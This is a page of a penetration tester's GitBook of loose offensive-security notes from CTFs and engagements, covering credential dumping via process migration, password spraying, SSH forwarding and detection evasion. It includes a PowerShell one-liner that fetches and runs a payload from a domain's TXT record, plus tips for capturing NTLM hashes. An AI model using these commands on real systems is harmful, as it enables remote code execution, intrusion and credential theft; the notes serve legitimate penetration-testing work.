Tactics, Techniques, and Procedures
Personal BlogTwitterGitHubContact
  • Tactics, Techniques, and Procedures
  • ☠️Pentesting
    • Fortress
      • Automation
      • Cisco
        • Cisco Adaptive Security Appliance
        • Cisco Smart Install
      • CMS
        • Drupal
        • Wordpress
      • Exchange
      • Office365
      • Okta
      • Outlook Web Access (OWA)
      • SSH
      • Subdomain Takeover
    • Infrastructure
      • Active Directory
        • AD CS
        • Coercing Authentication
        • Credential Dumping
          • Cached Domain Credentials
          • Data Protection API (DPAPI)
          • Group Policy Preferences
          • LSA Secrets
          • LSASS Memory
          • NTDS
          • Security Account Manager (SAM)
          • Kerberos Tickets
          • Unsecured Credentials
          • WDigest
          • WiFi Profiles
        • Delegation Abuse
          • Constrained Delegation
          • Unconstrained Delegation
        • Domain Enumeration
        • Domain Dominance
          • Forge Golden Ticket
          • Forge Silver Ticket
          • Forge Trust Ticket
          • Skeleton Key
        • Group Policy Preferences
        • Kerberos
          • AS-REP Roasting
          • Kerberoasting
          • Kerberos Relaying
        • Lateral Movement
          • PowerShell
          • Windows Remote Management (WinRM)
        • Local Administrator Password Solution (LAPS)
        • NoPac
        • NTLMv1
        • Password Cracking
        • Password Policy
        • Password Spraying
        • Reconnaissance
        • Relaying
          • LDAP Relaying
          • SMB Relaying
        • Shadow Credentials
        • Zerologon
      • Database Management System (DBMS)
        • Microsoft SQL Server
      • Defense Evasion
        • Disable or Modify Tools
        • Disable Windows Event Logging
        • Impair Command History Logging
        • Timestomping
      • Low-Hanging Fruit
      • Networks
        • IPv6
        • LLMNR/NBT-NS Poisoning
        • Network Scanning
        • Network Sniffing
        • Segmentation Testing
        • Simple Network Management Protocol (SNMP)
        • Subnet Enumeration
        • Identifying Domain Information
      • Persistence
        • Create Account
        • Remote Desktop
        • Services
          • Service Privilege Escalation / Persistence
          • Systemd Service Persistence
        • Web Shell
        • DLL Hijacking
      • Pivoting
      • Privilege Escalation
        • Linux
          • Setuid and Setgid
        • Windows
          • Privilege Abuse
            • SeImpersonatePrivilege
            • SeLoadDriverPrivilege
          • Service Exploitation
    • Initial Access
      • Phishing
        • Creating Templates
          • Leveraging AI During Template Creation
        • Payloads
          • Non-malicious Callback
          • Macros
    • OSINT
      • Identifying Users
      • Network Information
      • Search Engines
    • Web Applications
      • Access Control
      • APIs
        • Swagger API
      • Authentication
        • Account Takeover
      • Clickjacking
      • Cross Origin Resource Sharing (CORS)
      • Cross Site Request Forgery (CSRF)
      • Document Object Model (DOM)
      • File Upload
      • Google Dorking
      • GraphQL
      • HTTP Request Smuggling
      • Information Disclosure
      • Insecure Direct Object Reference (IDOR)
      • Injection Vulnerabilities
        • Cross-Site Scripting (XSS)
          • Blind Cross-Site Scripting
          • Finding Cross-Site Scripting
          • Stealing Cookies
          • XSS Payloads
        • CSV Injection
        • XML External Entity Injection (XXE)
        • LDAP Injection
        • NoSQL Injection
        • Server-Side Template Injection
        • SQL Injection
      • JSON Web Tokens (JWT)
      • Local File Inclusion (LFI)
      • OAuth
      • Open Redirection
      • Password Reset Poisoning
      • Prototype Pollution
      • Race Condition
      • Rate Limit Bypass
      • Remote Code Execution (RCE)
      • Remote File Inclusion (RFI)
      • Suspicious Parameters
      • Tooling
        • Burp Suite
          • Authentication / Proxy Issues
          • Intruder Attack Types
          • Match and Replace
          • Quality of Life
        • Misc Tooling
      • WAF Bypasses
      • WebSockets
      • Web Cache Deception
      • Web Cache Poisoning
    • Wireless
      • WPA / WPA2
        • Alfa Troubleshooting
        • Enterprise
        • Personal
    • Cloud
      • Amazon Web Services (AWS)
      • Microsoft Azure
  • 🧨Red Teaming
    • C2
      • Cobalt Strike
      • Empire
      • Metasploit
        • Metasploit Datatabase
      • Mythic
      • Sliver
    • Malware Dev
    • Offensive Infrastructure
      • Cloud Fronting
      • Redirectors
      • OpSec
      • Phishing Infrastructure
      • Creating a Dropbox
    • Offensive Tactics
    • Philosophy
  • 🦋Bug Bounty
    • Bug Bounty Tips & Tricks
  • 📖Resources
    • Blog Posts and Goodies
    • Checklists
    • Offensive Security Notes
    • Tooling Repository
    • Active Directory Toolkit
Powered by GitBook
On this page
  1. Resources

Offensive Security Notes

Unorganized collections of my notes from CTFs and penetration tests

PreviousChecklistsNextTooling Repository

Last updated 3 months ago

1. Search for whitelisted applications when looking to migrate and dump credentials. During a penetration test I was struggling to dump credentials with Kiwi as a PoC. Migrating into an AppSense application that is required to be whitelisted by endpoints can result in easy l00t. lists a few of the executables that I was able to migrate into with Meterpreter and proceed to execute Kiwi from, namely EMUser.exe.

2. Time to Live

TTL > 64 it is most likely a Linux box
TTL > 128 it is most likely a Windows
TTL < 128 most likely some type of networking device.

3. Some quick notes on organizing tooling:

  • Download and place the tool into /opt/ (e.g., Aquatone).

  • Execute the following command on the Aquatone binary: ln -s /opt/aquatone/aquatone /usr/local/bin/aquatone

3. Reverse shell preferences:

  • External: Bind shell

  • Internal: Reverse shell

4. for .NET Framework & Windows OS Versions. We can then to exploit the system.

  • Compile the binaries yourself.. Unless it's a CTF.

5. Performing password spraying with from my experience is more successful than using the . Ran into a situation on an engagement where multiple valid logins were reported as invalid by SprayingToolkit.

6. Kali Linux allows for multiple IP addresses to be set manually on an interface, allowing for you to set multiple callbacks in case one of your IP addresses gets banned. The following demonstrates a screenshot of this:

7. Download a Nessus scan via Metasploit:

# Load the Nessus plugin
load Nessus

# Authenticate to Nessus
nessus_connect $username:$password@127.0.0.1:8834

# List Available Nessus Scans (Pay attention to the ID)
nesssus_scan_list

# Export the Nessus Scan
Nessus_scan_export $id nessus

Download the Nessus scan to ~/.msf
nessus_report_download $id $fileid

# Report is then accessible in the ~/.msf4/local directory
# Rename the file to $client.nessus

8. Quick SSH tips:

Add SOCKS to an Existing SSH Connection

<enter> ~C
-D 1080

Forward a Port on an Existing SSH Connection

<enter> ~C
-L 1337:localhost:1337

12. Your daily reminder that RDP local admin bruteforce has no rate limiting.

13. If you have a shell on a Windows host and need to check if your process is high integrity without sounding alarms, you can issue the following check:

# >= high if file listing is shown
CMD -> dir \windows\temp
PowerShell --> ls \windows\temp

14. A fun way to execte payloads is via a domains TXT record, the following command will run the provided payload:

powershell . (nslookup -q=txt parzival.sh)[-1]

15. Always perform content discovery both as an unauthenticated and authenticated user (provide cookies to tool of choice)

16. Trigger NTLM authentiction over HTTP from the command line:

Invoke-WebRequest -UseDefaultCredentials
  1. Impacket's wmiexec.py is useful for lateral movement but is often detected. To potentially defeat detections, change the tgt share (-share C$) or use "-silentcommand".

  2. Leave Pcredz, Impacket SMB server, Responder (Analyze mode), etc running all the time. You never know when a random Domain Admin will try to auth to you over NTLM (agentless security products).

  3. If you PWN a system during a penetration test (local admin privs) but still don't have a "domain user" - you can escalate privileges to SYSTEM and leverage the machine account.

  4. Large password lists such as Rockyou2021 are mostly junk. Bigger ≠ better. Weakpass.com has several wordlists with Kaonashi being decent and https://weakpass.com/wordlist/1927 being one of the largest suggested as they're inflated with junk.

9. Make your life significantly easier when analyzing email headers with .

10. Trying to make a high quality screenshot to illustrate commands used? Check out .

10. Don't know what a command does? There's no shame in that. For Linux check out and for PowerShell use.

11. Check the configuration of LAPS using a machine account per , as it was noted that configurations are often messed up for them.

📖
Message Header Analyzer
carbon.now.sh
ExplainShell
ExplainPowershell
@HackingLZ
This link
Microsoft has a great reference
use a precompiled binary from SharpCollection
SprayCharles
SprayingToolkit